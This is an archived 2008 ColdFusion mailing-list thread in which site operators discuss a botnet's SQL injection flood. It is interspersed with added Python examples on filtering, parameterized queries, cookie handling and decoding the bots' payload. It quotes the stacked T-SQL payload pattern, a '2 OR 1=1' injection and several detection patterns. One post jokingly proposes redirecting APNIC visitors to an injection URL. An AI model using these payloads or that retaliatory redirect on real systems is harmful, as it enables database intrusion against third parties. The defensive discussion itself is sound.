House of Fusion
ColdFusion Talk (CF-Talk)

SQL injection attack on House of Fusion
Author:
David Moore, Jr.
08/20/2008 06:09 PM

Well, it is my goal :) not there yet...

> Subject: Re: SQL injection attack on House of Fusion
> From: cftalk@ecartech.com
> To: cf-talk@houseoffusion.com
> Date: Wed, 20 Aug 2008 16:59:26 -0500
>
> > is <cfqueryparam> something a lot of programmers really use?
>
> Only the good ones. ;)
>
> Thanks,
>
> Eric
>
> David Moore, Jr. wrote:
> > When you say "Update Your Code", are you saying using <cfqueryparam>? But even so, the SQL injection still will use up countless resources instead of cutting it off early. So, go back and fix 1,000's of lines of code I have developed over the last 'umpteen' years or stop it before it starts? Is this something new to CF8 or just a necessary evil because of SQL Injection Attacks?
> >
> > Not trying to pick a fight, because I am sure you have forgotten more code than I will ever know (seriously) and I am probably just being lazy (seriously), but is <cfqueryparam> something a lot of programmers really use? I have never seen <cfqueryparam> used on any tags I have purchased or exchanged and I am afraid all I know is what I have learned from books and forums. This is the first I have ever heard of using <cfqueryparam>.
> >
> > ~David G. Moore, Jr.

> Subject: Re: SQL injection attack on House of Fusion
> From: jscott@gravityfree.com
> To: cf-talk@houseoffusion.com
> Date: Wed, 20 Aug 2008 17:01:42 -0400
>
> > I am currently using the SQLprev.cfm from Jochem to stop the onslaught of superfluous bandwidth suckage from my server, but was wondering what the difference would be with this one. I am not looking to start a "my SQL Injection blocker is better than yours", yet trying to educate myself on just what is going on and what is best to do.
>
> My original SQLprev script (http://www.gravityfree.com/_sqlprev.cfm.txt) just checks for basic SQL keywords with a semicolon in URL variables. It's a quick and dirty way to give you some protection from bots short-term while your code base is updated to use best practices and secure coding methods.
>
> Mary Jo's is more thorough in that it checks additional variable scopes, and can help protect better against hand-drafted attacks, but may have a higher potential for false positives (though it's improved recently from what I can tell).
>
> SQLPrev has a version compatible with CF5 for those who need it where the other script relies on CFMX functions to run. I'm not saying one is better than the other, they both get the job done. Just use whatever works best for you, and update your code so that you don't need either of them <g>.
>
> -Justin Scott
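The point Eric and Justin make above (cfqueryparam is the fix, a keyword filter is only a stop-gap), as an added example in Python with sqlite3 standing in for cfquery against a ColdFusion datasource. None of it is SQLprev, Mary Jo's script or code from the thread; the filter is a simplified model of what Justin describes (a SQL keyword following a semicolon), and the table, its rows and the URL values are constructed for the demonstration. It shows a value with no semicolon at all passing the filter and changing the meaning of the concatenated query, while the bound parameter is compared as data and matches nothing. Python's sqlite3 execute() refuses stacked statements, so the bot's own ;DECLARE ... EXEC(@S) payload is only shown being caught by the filter; SQL Server does run stacked statements, which is what the bot counts on.

```python
"""Keyword filter vs. parameterized query. Added example (Python/sqlite3),
standing in for <cfquery> with and without <cfqueryparam>; not SQLprev,
not Mary Jo's script, not code from the thread."""
import re
import sqlite3

# Simplified model of the stop-gap Justin describes: a SQL keyword that
# follows a semicolon. The real script's keyword list is not on the page.
_KEYWORD_AFTER_SEMICOLON = re.compile(
    r";\s*(declare|exec|select|insert|update|delete|drop|cast)\b", re.IGNORECASE)


def stopgap_filter_blocks(value: str) -> bool:
    """True if the quick filter would abort the request for this value."""
    return _KEYWORD_AFTER_SEMICOLON.search(value) is not None


def make_db() -> sqlite3.Connection:
    """In-memory table with one public and one unpublished row (constructed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    db.executemany("INSERT INTO news (title, published) VALUES (?, ?)",
                   [("public story", 1), ("draft, not yet public", 0)])
    return db


def titles_concatenated(db, url_id: str):
    """Vulnerable form: the URL value is spliced into the SQL text, which is
    what <cfquery> does with a bare #url.id#. The caller's intent (only
    published rows) lives in the same string the attacker gets to edit."""
    sql = f"SELECT title FROM news WHERE published = 1 AND id = {url_id}"
    return sorted(row[0] for row in db.execute(sql))


def titles_parameterized(db, url_id: str):
    """Fixed form: the value is bound, as <cfqueryparam> does. Whatever the
    string contains, it is compared with the id column as a value."""
    return sorted(row[0] for row in db.execute(
        "SELECT title FROM news WHERE published = 1 AND id = ?", (url_id,)))


if __name__ == "__main__":
    db = make_db()
    for url_id in ("1", "2 OR 1=1", "1;DECLARE @S CHAR(4000)"):
        print(f"{url_id!r}: filter blocks = {stopgap_filter_blocks(url_id)}")
    # The semicolon-free value sails past the filter and rewrites the
    # concatenated query's WHERE clause: the draft row leaks.
    print(titles_concatenated(db, "2 OR 1=1"))
    # The same value bound as a parameter matches no id at all.
    print(titles_parameterized(db, "2 OR 1=1"))
```

The filter catches the bot traffic seen in the thread and is worth having while the code base is fixed; it does nothing for a hand-written value like "2 OR 1=1", and only the parameterized query is indifferent to what the value contains.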
Author:
Michael Dinowitz
08/08/2008 10:22 AM

Sorry for the problems with the House of Fusion site. We've been under massive attack by SQL injection bots and I've just been able to get a handle on it. A fast solution to the problem is this:

<cfif findnocase("';DECLARE", cgi.query_string)><cfabort></cfif>

It works unless you have a few hundred attacks at a time. In that case, place a cfmail before the abort and send yourself the cgi.remote_addr. Then block it on the webserver level. It works very well. I've blocked a dozen IPs and now the site is back to flying.

--
Michael Dinowitz (http://www.linkedin.com/in/mdinowitz)
President: House of Fusion (http://www.houseoffusion.com)
Publisher: Fusion Authority (http://www.fusionauthority.com)
Adobe Community Expert / Advanced Certified ColdFusion Professional
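Michael's stop-gap, as an added example in Python rather than the CFML line above (this is not his code, nor anything from House of Fusion). It takes the same decision on the raw query string, before any parameter parsing, and returns a date/time/IP log entry instead of sending mail. The two extra patterns (the URL-encoded form of the same request and the CAST(0x... AS CHAR) wrapper), the log layout and the sample requests are my assumptions; the hex in the first sample is made up and decodes to the word SELECT.

```python
"""Stop-gap request filter for the SQL injection bot traffic in this thread.
Added example (Python); not the CFML Michael posted.

The check runs on the raw query string, before any parameter parsing: the
bot's payload is not sent as a parameter value, so cgi.query_string (here
the query_string argument) is the right thing to inspect.
"""
import re
from datetime import datetime
from urllib.parse import unquote_plus

# Patterns for the bot request shown in the thread. The encoded and hex-CAST
# variants are my additions: a literal match on ';DECLARE misses %3BDECLARE
# and mixed case.
_SIGNATURES = (
    re.compile(r";\s*DECLARE\s+@\w+", re.IGNORECASE),                       # ;DECLARE @S ...
    re.compile(r"CAST\s*\(\s*0x[0-9a-f]+\s+AS\s+N?(?:VAR)?CHAR", re.IGNORECASE),  # CAST(0x.. AS CHAR
    re.compile(r"EXEC\s*\(\s*@\w+\s*\)", re.IGNORECASE),                    # EXEC(@S)
)


def is_injection_attempt(query_string: str) -> bool:
    """True if the raw query string carries the bot's T-SQL pattern."""
    decoded = unquote_plus(query_string)
    decoded = unquote_plus(decoded)  # tolerate one level of double-encoding, no more
    return any(sig.search(decoded) for sig in _SIGNATURES)


def log_line(remote_addr: str, query_string: str, when: datetime) -> str:
    """One 'date, time, client IP' entry, the logging Ben describes using
    instead of cfmail. The exact layout is my assumption."""
    return f"{when:%Y-%m-%d} {when:%H:%M:%S} {remote_addr} {query_string[:120]}"


def handle_request(remote_addr: str, query_string: str, when=None):
    """Decide a request the way the <cfif findnocase(...)><cfabort></cfif> line
    does, but hand back a log entry rather than sending mail (4,000 mails in
    five minutes is its own DoS, as the thread notes).

    Returns ("abort", log_entry) for attack traffic, ("continue", None) otherwise.
    """
    when = when or datetime.now()
    if is_injection_attempt(query_string):
        return "abort", log_line(remote_addr, query_string, when)
    return "continue", None


if __name__ == "__main__":
    # Constructed sample requests; the hex payload decodes to 'SELECT'.
    samples = [
        ("203.0.113.7", ";DECLARE @S CHAR(4000);SET @S=CAST(0x53454C454354 AS CHAR(4000));EXEC(@S);"),
        ("203.0.113.8", "id=1%27%3BDECLARE+%40S+CHAR%284000%29"),
        ("198.51.100.2", "q=declare+independence&page=2"),
    ]
    for ip, qs in samples:
        print(handle_request(ip, qs, datetime(2008, 8, 8, 10, 22, 0)))
```

The decision sits where Michael put his cfif, at the top of Application.cfc, ahead of any database work; the log entries are what you feed a web-server-level block list from, rather than an inbox.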

Author:
Scott Stewart
08/08/2008 10:36 AM

Yeah, I've gotten a couple today.. but fortunately when Ray built BlogCFC, he covered his bases.

Scott Stewart
ColdFusion Developer
Office of Research Information Systems
Research & Economic Development
University of North Carolina at Chapel Hill
Phone: (919) 843-2408  Fax: (919) 962-3600
Email: sastew01@email.unc.edu

Author:
Michael Dinowitz
08/08/2008 10:43 AM

Covering the bases with cfqueryparam is one thing; being mobbed is another. Sometimes you have to stop these things before any other code is run. I've put that abort script at the top of all my Application.cfcs just to brute-force stop the horde.

Author:
Scott Stewart
08/08/2008 10:49 AM

And you're absolutely right. I've gotten two and query params covered it, but it sounds like you're getting hit two-pronged. "If the injection doesn't do something, the brute force attack will."

I'm almost flattered that someone thought my site was important enough to attack...

Scott Stewart

Author:
Tom Chiverton
08/08/2008 11:33 AM

> I'm almost flattered that someone thought my site was important enough
> to attack...

They didn't. The attack is probably driving itself based on a Google search ( [inurl:.cfm] ?).

--
Tom Chiverton

****************************************************
This email is sent for and on behalf of Halliwells LLP. Halliwells LLP is a limited liability partnership registered in England and Wales under registered number OC307980 whose registered office address is at Halliwells LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is available for inspection at the registered office. Any reference to a partner in relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The Solicitors Regulation Authority.

CONFIDENTIALITY
This email is intended only for the use of the addressee named above and may be confidential or legally privileged. If you are not the addressee you must not read it and must not use any information contained in nor copy it nor inform any person other than Halliwells LLP or the addressee of its existence or contents. If you have received this email in error please delete it and notify Halliwells LLP IT Department on 0870 365 2500.
For more information about Halliwells LLP visit www.halliwells.com.

Author:
Scott Stewart
08/08/2008 11:44 AM

Ouch.... Thanks Tom... :)

--
Scott Stewart

Author:
Michael Dinowitz
08/08/2008 11:44 AM

Which explains why House of Fusion is being so heavily hit. We're literally everywhere on Google. Fusion Authority, on the other hand, has all of its URLs masked to .htm, so the only one being attacked there is an old .cfm archive.

I'm working on a webserver-level fix for this which will bypass the need to block based on IPs. I just need a few moments. The attacks are hitting VERY hard. I got 4000 alert emails in the space of 5 minutes before I turned them off again.

Author:
Ben Forta
08/08/2008 11:54 AM

Yep, I turned e-mail notifications off too; leave it on and you can inadvertently turn blocking SQL injection attacks into a self-imposed DoS attack. Fun stuff.

On the plus side, it's nice to see CF finally getting the recognition it deserves, even if it is from parasitic bottom-feeding bots created by despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form repugnant socially-inept basement-dwelling death-penalty-deserving hacker-wannabes.

--- Ben

Author:
Alan Rother
08/08/2008 11:59 AM

Geez Ben, tell us how you really feel... =]

--
Alan Rother
Adobe Certified Advanced ColdFusion MX 7 Developer
Manager, Phoenix Cold Fusion User Group, AZCFUG.org

Author:
Mark Kruger
08/08/2008 12:01 PM

Ben,

I know I speak for all of us when I say this is a side of you we've never seen. The jury's out but I think I like it (ha).

-Mark

Author:
Brad Wood
08/08/2008 12:02 PM

Tell us how you really feel Ben. :)

I had to temporarily stop Apache on my site long enough to get a stop gap in place. My database is safe, but I was getting around 90 requests a second and ColdFusion and MySQL were eating up all the server's CPU trying to keep up. SSH was even unresponsive.

I think I'm going to dump all these attempts in a database to analyze. I'm curious where the majority of the IPs are coming from. There has to be a way to squeak in the ear of ISPs loud enough to have them shut down infected users until they are cleaned.

~Brad

Author:
Ben Forta
08/08/2008 12:09 PM

Yep, was curious about that too. I modified Justin's script to not send e-mails, but to write a simple log entry - more an act of curiosity than anything else - I just log the date, time, and client IP address.

--- Ben

Author:
Alan Rother
08/08/2008 12:12 PM

I think a lot of us are doing that now. Do you think it would be helpful in some way for us to all pool that data? Create some central repository for it so we can all make use of it and maybe even get the attention of some of the ISPs?

--
Alan Rother
Adobe Certified Advanced ColdFusion MX 7 Developer
Manager, Phoenix Cold Fusion User Group, AZCFUG.org

Author:
Andrew Scott
08/11/2008 04:40 AM

Well.......

This has got to be the strongest case for unit testing then... If a component is unit tested, then the first thing is that you will know that this could happen and fix it straight away.

The second is that this is why..... ColdFusion should have adopted an approach that used an ORM instead.... With an ORM it reduces the risk, provided the ORM takes these attacks seriously. I have never seen these attacks with Hibernate, within GORM and Domain Driven Design approaches.

I so hope that ColdFusion 9 has 2 things on its release.

1) The engine itself is open sourced. And the extra functionality and support for middle tier API integration is adopted.
2) GORM style approach as in DDD (Domain Driven Design) is taken more seriously.

With these 2 additions then SQL injection will be a thing of the past.

--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273

Author:
Brad Wood
08/08/2008 12:24 PM

Dang, the brutes thought of everything. I even tried a test to see if the bots would return cookies I attempted to set in order to track them easier.

Nope, they don't.

~Brad

Author:
Wil Genovese
08/08/2008 12:30 PM

Very few bots accept cookies. I've never actually seen one that does, but I have read it is possible to write one that will.

Wil Genovese

One man with courage makes a majority. -Andrew Jackson
A fine is a tax for doing wrong. A tax is a fine for doing well.

Author:
Claude Schneegans
08/08/2008 12:51 PM

>> very few bots accept cookies. I've never actually seen one that does, but I have read it is possible to write one that will.

... If you use CF to write the bot, for instance ;-)

--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com) Thanks.

Author:
Gerald Guido
08/08/2008 06:15 PM

>> .... If you use CF to write the bot, for instance ;-)

Speaking of such, snagging a cookie with CF is ridiculously easy (of course it is ;) ). cfhttp returns the responseHeader as a structure.

EX: This:

<cfoutput>
#cfhttp.responseHeader["Set-Cookie"]#
</cfoutput>

Returns this:

mytestcookie=test;expires=Sun, 01-Aug-2038 21:57:28 GMT;path=/

Author:
Brad Wood
08/08/2008 01:14 PM

Well, at its most basic level, the process of "accepting a cookie" is really nothing more than parsing the response headers you get back from the web server looking for set-cookie: headers, and then returning the same name/value pairs in a cookie: header the next time you send a request to the server. Sure, there are rules around how it is supposed to work, but it isn't hard to implement.

I can see how it would be advantageous to a bot if more and more sites these days required cookies in order to browse to all the pages.

~Brad

> very few bots accept cookies. I've never actually seen one that does,
> but I have read it is possible to write one that will.
>
> Wil Genovese
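The mechanics Brad describes, as an added example (Python) of the minimum a client needs in order to "accept a cookie": read the Set-Cookie headers from a response, keep each name=value with its Path, and send the matching pairs back as one Cookie header on the next request. This is not code from the thread or from any bot. The sample response headers are constructed (one of them is the Set-Cookie line Gerald shows; CFID and CFTOKEN are the cookies ColdFusion sets for session tracking), and ignoring Expires, Domain and Secure is a deliberate simplification for a same-host tracker.

```python
"""Minimal cookie handling: Set-Cookie in, Cookie header out. Added example."""


def parse_set_cookie(response_headers):
    """response_headers: list of (header_name, value) pairs from one response.
    Returns {cookie_name: (value, path)}; a later Set-Cookie for the same
    name overrides an earlier one. Expires/Domain/Secure are ignored here."""
    jar = {}
    for header, value in response_headers:
        if header.lower() != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        name, _, cookie_value = parts[0].partition("=")
        path = "/"
        for attribute in parts[1:]:
            key, _, attr_value = attribute.partition("=")
            if key.strip().lower() == "path" and attr_value.strip():
                path = attr_value.strip()
        jar[name.strip()] = (cookie_value.strip(), path)
    return jar


def _path_matches(cookie_path: str, request_path: str) -> bool:
    """RFC 6265 path-match: equal, or the cookie path is a directory prefix
    (so a cookie for /admin applies to /admin/x.cfm but not /administrator)."""
    if request_path == cookie_path:
        return True
    prefix = cookie_path if cookie_path.endswith("/") else cookie_path + "/"
    return request_path.startswith(prefix)


def cookie_header(jar, request_path: str):
    """The Cookie: header value for the next request, or None if none apply."""
    applicable = [f"{name}={value}" for name, (value, path) in jar.items()
                  if _path_matches(path, request_path)]
    return "; ".join(applicable) if applicable else None


# Constructed sample response: the Set-Cookie Gerald quotes, the two session
# cookies a ColdFusion server sets, and one scoped to /admin.
SAMPLE_RESPONSE_HEADERS = [
    ("Content-Type", "text/html; charset=UTF-8"),
    ("Set-Cookie", "mytestcookie=test;expires=Sun, 01-Aug-2038 21:57:28 GMT;path=/"),
    ("Set-Cookie", "CFID=123; path=/"),
    ("Set-Cookie", "CFTOKEN=456; path=/"),
    ("Set-Cookie", "adminpref=1; path=/admin"),
]

if __name__ == "__main__":
    jar = parse_set_cookie(SAMPLE_RESPONSE_HEADERS)
    for path in ("/index.cfm", "/admin/index.cfm"):
        print(path, "->", cookie_header(jar, path))
```

A bot that does this much will show up in the tracking experiment Brad describes as "returning the cookie"; one that fires requests and ignores the response never will, which is the distinction his later numbers turn on.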

Author:
Andrew Scott
08/11/2008 04:41 AM

Hmmm... Of course it is possible to use cookies.... They chose not to... Why... Because they have no real need to be attached to a session.... Think about it for a minute or two...

Author:
Brad Wood
08/11/2008 11:27 AM

Actually, if you read my blog analysis of the zombies:

http://www.codersrevolution.com/index.cfm/2008/8/10/My-analysis-of-the-SQL-injection-zombies

7% of the IPs returned a cookie I set. 75% of IPs that sent more than 2 hits returned my cookie. (Hits came in groups of two.)

I'm fairly convinced this bot used the Internet Explorer on the victim's machine to send out the requests. I can't prove it, but it probably would have been easier for them to code that way.

~Brad

Author:
Tom Chiverton
08/11/2008 11:42 AM

> I'm fairly convinced this bot used the Internet Explorer on the victims

It would make sense to use the same ActiveX control IE uses, yes.

--
Tom Chiverton

Author:
Brad Wood
08/08/2008 12:40 PM

> Dang, the brutes thought of everything. I even tried a test to see if the
> bots would return cookies I attempted to set in order to track them
> easier.
> Nope, they don't.

Ok, I take that back. SOME, but not all, of the hack attempts come back to my site with the cookie I sent to them previously. Rather interesting -- I would expect them to all behave the same way. Perhaps there are different versions of the Trojan out there.

Also, the attacks on my server today seem to either be targeting certain SES URLs, or just plain broken. I am getting hits like:

/index.cfm?;DECLARE @S CHAR(4000);SET @S=CAST(0x4...6F72 AS CHAR(4000));EXEC(@S);

You can see that the malicious string is NOT being sent in as any particular URL parameter. Furthermore, since the = sign has not been escaped, the string gets broken up such that the variable name is ";DECLARE @S CHAR(4000);SET @S" and the value is the rest of the string. What the heck are they trying to do? Has today's attacks actually infected anyone?

~Brad
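What the request Brad quotes actually carries, as an added example (Python, not code from the thread). The page elides the hex as 0x4...6F72, so the payload in the sample below is constructed and decodes to a harmless SELECT; the function names are mine. The first function reproduces the split Brad describes (the whole T-SQL prefix becomes a parameter name because the first "=" in the string is the one in SET @S=), and the second recovers the text hidden inside the CAST(0x... AS CHAR(4000)) wrapper. That hidden text is the part worth logging: the visible query string says nothing about what EXEC(@S) would run, and CHAR payloads are single-byte while NCHAR payloads are UTF-16LE.

```python
"""Decoding the bot request Brad quotes. Added example, not code from the
thread; the hex payload in the sample is constructed (the real one is
elided on the page as 0x4...6F72)."""
import re
from urllib.parse import unquote_plus

# CAST(0x<hex> AS CHAR|VARCHAR|NCHAR|NVARCHAR ...). Group 2 captures the 'N'
# prefix: N-typed literals are UTF-16LE, the others single-byte.
_CAST_HEX = re.compile(
    r"CAST\s*\(\s*0x([0-9a-f]+)\s+AS\s+(N?)(?:VAR)?CHAR", re.IGNORECASE)


def split_as_cf_would(request_uri: str):
    """Parameter pairs as a query-string parser sees them: split on '&', then
    each chunk at its FIRST '='. Nothing in the bot's request is escaped, so
    the first '=' is the one in 'SET @S=' and the whole T-SQL prefix becomes
    the parameter name, exactly the split Brad describes."""
    query = request_uri.partition("?")[2]
    pairs = []
    for chunk in query.split("&"):
        if not chunk:
            continue
        name, _, value = chunk.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def decode_cast_payloads(request_uri: str):
    """Every string hidden inside CAST(0x... AS [N][VAR]CHAR), decoded to text.
    This is the SQL that EXEC(@S) would run; it is what belongs in the log."""
    payloads = []
    for hexstr, n_prefix in _CAST_HEX.findall(request_uri):
        if len(hexstr) % 2:          # malformed: odd number of hex digits
            continue
        raw = bytes.fromhex(hexstr)
        payloads.append(raw.decode("utf-16-le") if n_prefix else raw.decode("latin-1"))
    return payloads


# Constructed sample in the shape Brad shows; the hex decodes to a harmless SELECT.
SAMPLE_URI = ("/index.cfm?;DECLARE @S CHAR(4000);SET @S=CAST("
              "0x53454C45435420312041532073616D706C655F7061796C6F6164"
              " AS CHAR(4000));EXEC(@S);")

if __name__ == "__main__":
    for name, value in split_as_cf_would(SAMPLE_URI):
        print(f"name  = {name!r}\nvalue = {value!r}")
    print("hidden SQL:", decode_cast_payloads(SAMPLE_URI))
```

Because the payload never lands in a named parameter, a check on url.* variables alone would not see it; the raw query string (or the whole request URI, as here) is what has to be inspected.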

Author:
Mark Kruger
08/08/2008 01:03 PM

Brad,

That might make sense if the infection is some sort of control that makes use of an underlying request architecture (IE's, for example). If that were the case then the request would be exactly as if it came from the user's browser... cookies and all - yes?

-mark

Author:
Brad Wood
08/08/2008 01:09 PM

That makes a bit of sense. One difference would probably be if the attackers were interested in the web server's response. If not, they could just fire and forget the request and ignore anything that came back, including set-cookie headers. I'm just curious why some of the hits return the cookie after multiple successive hits, but others don't. It may have to do with the order the hits are sent out. The bot could spider one page, and then send out 15 async attack attempts to all the links on that page before moving on.

I'd love to get my hands on an infected machine, but that would be about impossible without ISPs giving a darn.

~Brad

Author:
Andy Matthews
08/08/2008 04:08 PM

Blocking the IPs would probably stop the attacks, but analyzing them is going to be useless. They're either using some hacked computer as a proxy, or have some sort of spoofing in place. Unless you're really good at forensics, you'll never find their real origination point.

andy

Author:
Brad Wood
08/08/2008 04:25 PM

Yeah, I'm well aware of the near impossibility of ever tracking an IP address to anything useful, but I'm a person who likes data, for within mounds of useless data can be found trends. Most of all, I'm just curious. Also, I'd like to explore the possibility of reporting compromised people to their ISPs. Some US ISPs do have abuse policies that might cause them to pressure their users to clean themselves. A number of these attacks could have come from servers for all we know. Servers are desirable for Trojans due to their fast internet connections and 24/7 uptime.

~Brad

> blocking the IPs would probably stop the attacks, but analyzing them is
> going to be useless. They're either using some hacked computer as a proxy,
> or have some sort of spoofing in place. Unless you're really good at
> forensics, you'll never find their real origination point.

Author:
Eric P
08/08/2008 05:06 PM

Once we followed around the IP addresses of what appeared to be a lone form stuffer. We began to ban any requests from his IP. Then 20-30 minutes later he would show up again with a different IP. Investigating his IP addresses showed him "coming" from Chile, Denmark, etc. So how is anyone going to be able to effectively communicate with these IPs to tell them about the compromised systems on their network? The problem becomes even more difficult to enforce since IPs don't necessarily want to offend their paying customers.

Eric Pierce

Author:
Claude Schneegans
08/08/2008 05:17 PM

>> Then 20-30 minutes later he would show up again with a different IP.

How do you know it was the same guy? Maybe it was the same bot doing the same thing, but these bots are just like viruses, they spread anywhere.

--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com) Thanks.

Author:
Eric P
08/08/2008 05:26 PM

----- Excess quoted text cut - see Original Post for more ----- We don't.  It was definitely an automated attack (i.e., bot), but it "felt" like it was controlled by one source/individual as opposed to several sources doing the same attack method because as we blocked each IP address the attack took ~20-30 minutes to begin again (i.e., switch IP address).  And each chunk of attacks was coming from a solitary IP address (which is why we began blocking them). Errata: Below I meant "IPs" to be "ISPs".   "So how is anyone going to be able to effectively communicate with these IPs to tell them about the compromised systems on their network? The problem becomes even more difficult to enforce since IPs don't necessarily want to offend their paying customers." Eric Pierce

Author:
Brad Wood
08/08/2008 07:05 PM

> The problem becomes even more difficult to enforce > since ISPs don't necessarily want to offend their paying customers. It depends on the ISP.  I've seen plenty that didn't mind telling a customer they needed to clean their server or be shut down. The real impossibility I've found is actually getting information about the user of an IP address. (This is probably a good thing.)  ISPs generally won't cough anything up without a court order and you usually can't get one of those unless you have a certain dollar figure worth of damages.  I have had ISPs contact their customers on my behalf to question them about suspicious activity though. ~Brad

Author:
Terry Ford
08/08/2008 05:09 PM

<< Also, I'd like to explore the possibility of reporting compromised people to their ISPs. >> Well good luck ;) As I posted earlier, we have been hit by over 200,000 attack attempts over the past 2 days. Here's the analysis from our last 195,264 attack attempts: Our attacks over the past *24 hours* have originated from *12,007* different IP addresses.  Twelve THOUSAND.  That is not a typo.   This is an extremely large botnet, pure and simple.   These IP addresses appear to be largely random folks who are using browsers with vulnerabilities.   Each client, on average, makes 2-4 attack requests. Here are the origin IPs with the most attacks:

+-----------------+---------+
| ip              | attacks |
+-----------------+---------+
| 203.160.1.40    |    1246 |
| 203.160.1.70    |     596 |
| 61.164.132.230  |     478 |
| 211.72.233.9    |     471 |
| 203.162.3.159   |     462 |
| 211.72.233.8    |     452 |
| 211.72.233.10   |     429 |
| 221.253.217.138 |     319 |
| 210.112.177.244 |     252 |
| 59.15.212.125   |     252 |
| 70.88.218.70    |     240 |
| 67.86.134.184   |     234 |
| 125.107.109.47  |     231 |
| 202.92.190.172  |     225 |
| 59.114.123.73   |     224 |
| 12.215.231.131  |     218 |
| 68.193.151.157  |     200 |
| 98.28.106.213   |     200 |
| 122.118.202.29  |     198 |
| 67.184.18.83    |     196 |
+-----------------+---------+

There have been fewer than 5 attacks from each of 4515 different IPs. So for those of you trying to stop this sort of thing by blocking IP addresses, don't bother.
Some of those 203.* and 211.* addresses look suspicious, and perhaps are part of the botnet control, but who knows... I have the complete list of 12,000 IP addresses (and counting at the rate of 500+ new IP addresses each hour) of this botnet available if that's of any use to anyone. Regards --- On Fri, 8/8/08, Brad Wood <brad@bradwood.com> wrote: ----- Excess quoted text cut - see Original Post for more -----

Author:
Matt Robertson
08/08/2008 05:49 PM

Well I guess I'm glad I am not the only one dealing with this.  I implemented

<cfif cgi.query_string contains "DECLARE%20">
    <cfheader statuscode="500" statustext="Server Error">
</cfif>

at the top of /Application.cfm and that stopped it dead in its tracks, but not before spiking my custom logging app and turning my weekly sales response figures to oatmeal.  A little spit and polish fixed that. One client had about a 3-day love affair with these bots before they went away.  They made a mess of his error logs when the non-conforming data hit cfqueryparam but otherwise no noticeable effect. I think if I was still actively in the contract programming scene I would find the person propagating this and... pin a medal on them and shake their hand.  This one attack has caused a whole slew of folks who thought I was a PITA crank over-obsessed with security to call me up, apologize and thank me.  If I was still taking clients I'd have just doubled up my dance card. -- --m@Robertson-- Janitor, The Robertson Team mysecretbase.com

Author:
Al Musella, DPM
08/09/2008 12:39 PM

Here are my top 50: Note that the top 1 is in the same subnet as your top 1.     I had 134,993 attempts that I caught.. IP (times) 203.160.1.52 (705) 203.162.3.160 (373) 203.160.1.76 (325) 61.164.132.230 (325) 59.15.212.125 (258) 210.112.177.244 (252) 70.189.143.59 (219) 221.253.217.138 (204) 96.36.10.144 (196) 24.73.176.42 (194) 98.28.106.213 (190) 68.193.151.157 (165) 24.47.218.244 (162) 123.202.60.95 (143) 59.114.123.73 (141) 218.254.31.26 (140) 202.131.225.173 (138) 125.107.109.47 (135) 189.172.137.45 (133) 203.162.3.169 (133) 68.56.228.46 (133) 12.217.163.28 (132) 67.86.134.184 (132) 76.92.189.111 (132) 61.252.80.122 (131) 67.177.74.149 (130) 69.249.95.147 (130) 70.109.78.114 (129) 202.92.190.172 (125) 70.124.124.12 (124) 85.228.247.106 (122) 190.244.220.149 (121) 12.207.124.127 (118) 74.128.74.54 (118) 69.254.237.179 (117) 98.195.181.47 (117) 163.19.104.53 (114) 218.237.7.174 (114) 24.170.242.107 (114) 67.180.14.106 (113) 83.145.205.184 (112) 142.177.47.211 (110) 58.241.23.162 (110) 68.194.247.48 (110) 75.67.214.54 (110) 76.122.137.243 (110) 74.214.55.53 (108) 99.194.179.224 (108) 124.8.50.109 (107) 121.13.155.156 (105) ----- Excess quoted text cut - see Original Post for more -----

Author:
Bobby Hartsfield
08/09/2008 01:02 PM

Now look at how many of those are from Asia Pacific Network Info Centre .:.:.:.:.:.:.:.:.:.:. Bobby Hartsfield http://acoderslife.com http://cf4em.com ----- Excess quoted text cut - see Original Post for more -----

Author:
Brad Wood
08/09/2008 01:35 PM

Bobby, what have you been using to look up the origin of the IPs en masse? I found a site that lets me do a handful at a time, but I don't know how accurate the data is. It is saying the majority of my IPs originated from the US. ~Brad > Now look at how many of those are from Asia Pacific Network Info Centre

Author:
Bobby Hartsfield
08/09/2008 04:44 PM

I wrote something a long time ago to automate grabbing specified info from http://ws.arin.net/whois/ on an IP... I was bored. You can pass the IP in the URL like so: http://ws.arin.net/whois/?queryinput=203.160.1.52 So... parse the content of a cfhttp call to http://ws.arin.net/whois/?queryinput=#ipAddress# to grab what you want from the cfhttp.filecontent Hmmm... if everyone did something like this... it would not only be funny... but probably piss off apnic and make them do something about their portion of this problem (which is most of it)

<cfhttp url="http://ws.arin.net/whois/?queryinput=#cgi.remote_addr#" resolveurl="no" />
<cfif findnocase('Asia Pacific', cfhttp.filecontent)>
  <cflocation url="http://apnic.com/?;DECLARE @S CHAR(4000);SET @S=CAST( etc... etc..." addtoken="no" />
</cfif>

Or if you are nicer than me...

<cfif findnocase('Asia Pacific', cfhttp.filecontent) AND findnocase(';DECLARE', cgi.query_string)>

Yes... bored again. .:.:.:.:.:.:.:.:.:.:. Bobby Hartsfield http://acoderslife.com http://cf4em.com ----- Excess quoted text cut - see Original Post for more -----

Author:
Mike Kear
08/09/2008 04:53 PM

I guess i'm missing something, Bobby.   Why does a big share of the problem belong to Apnic? Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks http://afpwebworks.com ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month ----- Excess quoted text cut - see Original Post for more -----

Author:
Bobby Hartsfield
08/09/2008 05:37 PM

Because the majority of the IPs I've seen from this one belong to them... as they do more than not in these situations. Start keeping firewall logs in general and checking them. I guarantee you will find APNIC in them. .:.:.:.:.:.:.:.:.:.:. Bobby Hartsfield http://acoderslife.com http://cf4em.com ----- Excess quoted text cut - see Original Post for more -----

Author:
Brad Wood
08/09/2008 11:50 PM

I'd tell you to watch what you suggest on a public forum, but heck-- we already know the FBI doesn't care.  :) ~Brad ----- Excess quoted text cut - see Original Post for more -----

Author:
Bobby Hartsfield
